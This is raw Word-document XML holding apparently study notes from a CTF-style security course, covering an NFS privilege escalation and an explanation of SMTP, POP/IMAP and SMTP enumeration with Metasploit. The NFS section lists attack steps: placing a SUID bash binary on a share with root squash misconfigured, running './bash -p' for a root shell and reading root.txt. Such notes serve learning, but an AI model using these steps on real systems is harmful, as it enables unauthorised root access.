          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Github based bash shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FBA4FF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NFS Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF58C33" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gain low privilege shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1057E5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Upload bash executable to NFS share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3708BE17" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set SUID permissions through NFS due to misconfigured Root Squash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65714049" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Login through SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC18BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Execute SUID Bit Bash Exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E2442" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ROOT ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92061D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Move downloaded bash file to /tmp/mount directory holding NSF share and add SUID via sudo chmod +s bash and sudo chmod +x bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69017667" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Permissions should be: -rwsr-sr-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78282E86" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Navigate to victim /home/ directory, confirm bash shell is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388DB41B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run ./bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43392A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">If bash-4.4# </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> successful shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4D36E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use whoami and id to confirm root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FEE44" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cat /root/root.txt for flag??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A446F3B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Understanding SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C240B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Simple Mail Transfer Protocol, paired with protocol pair POP/IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF8C59" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allow user to send outgoing mail and retrieve incoming mail, respectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7D759" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMTP server performs three basic functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD40D4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Verifies who is sending emails through SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ACFA81" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sends outgoing mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812F982" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sends mail back to sender if it cannot be delivered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAD77B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>POP and IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242948B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Post Office Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6CBA6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Relatively simpler approach of downloading the inbox from the mail server, to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F8A3A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Internet Message Access Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376B4A1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Synchronize current inbox with new mail on the server, downloading anything new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC4B25" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Changes on one computers inbox will persist to another when synched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DBAF4C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>How does SMTP work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0BCD2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>User supplies mail, service transfers mail to recipient through a series of steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB87F55" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMTP sorts mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F9BED0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> SMTP server </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> POP/IMAP server </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> Recipient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A10B9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mail user agent (email client or external program) connects to SMTP server of a domain, initiating SMTP handshake (FIRST STEP OF SMTP PROCESS). Occurs over SMTP port 25. Once validated, session begins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010056E9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client submits sender and receiver email addresses, body of email, attachments, etc to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512E9FC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMTP server checks whether domain name of recipient and sender is the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A72B02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SMTP server of sender connects to recipient SMTP server before relay. If it cannot be accessed, email gets put into SMTP queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529D57C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Recipient SMTP server will verify incoming email by checking if domain and username are recognized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EFC3E5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Server then forward email to POP or IMAP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B1DD4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Email then shows in recipient inbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF42EC0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What Runs SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B24255" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows server platforms, variants on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA794C4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02ED88" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating Server Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F5B71" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Poorly configured or vulnerable mail servers often provide initial foothold into a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243BA25" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>First fingerprint server via “smtp_version” in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B48EAD8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Scans range of IP addresses and determines the version of any email servers it encounters</w:t>
      </w:r>
    </w:p>
